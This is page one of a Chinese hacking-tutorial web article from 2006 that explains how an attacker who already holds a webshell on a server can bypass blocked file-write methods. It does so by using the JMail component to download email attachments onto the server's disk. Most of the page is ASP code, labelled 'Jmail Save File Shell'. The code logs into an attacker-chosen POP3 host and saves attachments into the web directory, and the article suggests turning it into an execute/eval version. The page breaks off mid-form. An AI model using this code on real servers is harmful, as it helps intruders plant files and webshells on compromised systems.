| 网站首页 | 硬件维修 | 应用学院 | 网络组建 | 网站制作 | 菜鸟黑客 | 编程之道 | 数码大全 | 娱乐休闲 | 软件下载 | 在线视频 | 请您留言 | 技术论坛 | 
专 题 栏 目
最 新 热 门
最 新 推 荐
相 关 文 章
  • Foxmail账户入侵原理及防范方…

  • 黑客利用RM在IE上强行打开本…

  • 各种操作系统中密码文件的位…

  • 黑客破解Email账号常用的三种…

  • QQ帮你突破网吧硬盘访问限制

  • 各种操作系统中密码文件的位…

  • 常见危险文件病毒的防范方法

  • 文件型病毒的消毒原理

  • Qmail下防止滥用mail relay完…

  • 菜鸟破解email账号的技巧

  • Q
    您现在的位置: 我是IT人 >> 菜鸟黑客 >> 黑客攻防 >> 文章正文
    用Jmail写文件进硬盘           
    用Jmail写文件进硬盘
    作者:网络 文章来源:转载 点击数: 更新时间:2006-1-20
    [ 字体:缩小 正常 放大 | 双击自动滚屏 ]
    请选择合适的字体颜色:
        其实只算个模板,具体如果可以写这个ASP进主机的话,就背离了写这个程序的意义了.
    Jmail是现在非常流行的一个Mail组件,可以以简单的代码实现SMTP\POP3的功能.DVBBS\BBSXP等WEB脚本程序都有使用Jmail的选项功能.

        如果当我们以某种方式获得了WEBSHELL,比如差异备份,Or MSSQL SA Inj,比如inj Datebase Viz tinyshell,Or Other Way....但是我们无法向服务器传送文件,当然前提是如果不能使用FSO\Adodb.Stream\执行(Shell.application\Wscript.shell)等方式的情况下.

        这个时候在渗透的情况下似乎是一道嵌.不过Jmail一直有个Savetofile的动作,可以将Attachments保存到指定的路径..
    那么很简单的了.只要涌以下的代码就可以实现了....应该算是突破Stream\Fso等方式向硬盘里写文件的方式的一种吧,来自第3方组件也算一种不错的行为.

    以下方式请大家自行改成execute或eval版本..

    <%
      'codz by kEvin1986 [S4T]
      User=Request.Form("User")
      Pass=Request.Form("Pass")
      Popserver=Request.Form("Popserver")

      if User<>"" and Pass<>"" and Popserver<>"" then
        Set objmail = CreateObject( "JMail.POP3" )
        objmail.Connect User, Pass, Popserver

        set objmsg=CreateObject("jmail.message")
        Set objmsg = objmail.Messages.item(1)
        separator = ", "
        response.write "Attachment Name is: " & SaveAtta & "<br>"
        objmail.Disconnect
      End if

      Function SaveAtta()
        Set Attachments = objmsg.Attachments
        separator = ", "
        response.write "The size of this Attachment is: " & objmsg.size & "<br>"
        For i = 0 To Attachments.Count - 1
        If i = Attachments.Count - 1 Then
          separator = ""
        End If

        Set Theatta = Attachments(i)
        response.write Theatta.Name
        Theatta.SaveToFile(Server.Mappath(".") & "\" & Theatta.Name)
        Response.write "Oh!Hey Guy.....That's OK!"
        Next
      End Function
    %>

    <Html>
    <Head>
    <Title>Jmail Save File Shell</Title>
    </Head>
    <Body>
    <Center>
    <Form Method="POST">

    [1] [2] 下一页  

    文章录入:54iter    责任编辑:54iter 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    | 设为首页 | 加入收藏 | 联系站长 | 关于我们 | 友情链接 | 版权申明 |